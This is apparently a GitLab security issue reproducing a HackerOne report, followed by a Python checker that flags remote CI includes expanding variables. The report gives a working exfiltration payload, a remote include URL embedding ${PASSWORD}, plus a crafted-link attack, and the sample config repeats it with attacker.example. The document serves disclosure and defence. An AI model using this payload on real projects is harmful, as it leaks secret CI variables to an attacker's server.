Backend: Leaking CI variables by visiting the pipeline new page via fork MRs

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2031741 by shells3c on 2023-06-19, assigned to @ottilia_westerlund:


Report

SSOT

Refer to #417275 (closed)

Summary

Just by visiting a link crafted by the attacker, developers can leak CI variables to the outside

Steps to reproduce
  1. Set up a web server
  2. Create a public project with a CI variable, let's say PASSWORD
  3. Using another account (attacker), fork the project, add (or edit) .gitlab-ci.yml:

     ```yaml
     include:
       remote: 'https://<your_server>/${PASSWORD}.yaml'
     ```

  4. Copy the commit SHA and create a merge request with that change (to the victim project)
  5. The following URL is the attack vector: https://gitlab.com/<victim_project_path>/-/pipelines/new?ref=<copied_sha>

If the victim visits this link, the CI variable will be sent to the attacker's server. You can try it out by accessing the URL from the victim account.

Output of checks

This bug happens on GitLab.com

Impact

Developers can leak CI variables of their project by visiting a link
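As an added example (not part of the report or of GitLab's own code), a small defender-side check that walks a parsed `.gitlab-ci.yml` and flags `include:` entries whose remote URL expands a CI variable, which is the pattern this report abuses. It assumes the config has already been loaded with a YAML parser into a Python dict; the sample config and the host name in it are constructed.

```python
import re
from typing import Any, Dict, Iterable, List

# GitLab variable syntax as it appears in CI config: ${VAR}, $VAR, %VAR%.
VARIABLE_REF = re.compile(
    r"\$\{[A-Za-z_][A-Za-z0-9_]*\}|\$[A-Za-z_][A-Za-z0-9_]*|%[A-Za-z_][A-Za-z0-9_]*%"
)


def iter_remote_includes(config: Dict[str, Any]) -> Iterable[str]:
    """Yield every URL that an `include:` entry fetches from a remote host.

    `include` may be a single string, a single mapping, or a list mixing both.
    A bare string is a local path unless it looks like an http(s) URL.
    """
    include = config.get("include")
    if include is None:
        return
    entries = include if isinstance(include, list) else [include]
    for entry in entries:
        if isinstance(entry, str):
            if entry.startswith(("http://", "https://")):
                yield entry
        elif isinstance(entry, dict) and "remote" in entry:
            yield str(entry["remote"])


def find_variable_exfil_includes(config: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Return one finding per remote include whose URL contains a variable reference.

    Such a URL sends the expanded variable value to whichever host serves the include,
    so a config from an untrusted ref (e.g. a fork MR) deserves review before a pipeline
    is created for it in the upstream project.
    """
    findings = []
    for url in iter_remote_includes(config):
        refs = VARIABLE_REF.findall(url)
        if refs:
            findings.append({"url": url, "variables": refs})
    return findings


# Constructed sample modelled on the report's payload: a fork's .gitlab-ci.yml
# that expands the project variable PASSWORD into a remote include URL.
SAMPLE_CONFIG = {
    "include": [
        {"local": "/templates/build.yml"},
        {"remote": "https://attacker.example/${PASSWORD}.yaml"},  # constructed host
        "https://example.com/static.yml",
    ],
    "build": {"script": ["echo ok"]},
}

if __name__ == "__main__":
    for finding in find_variable_exfil_includes(SAMPLE_CONFIG):
        print(f"remote include expands {finding['variables']}: {finding['url']}")
```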

How To Reproduce
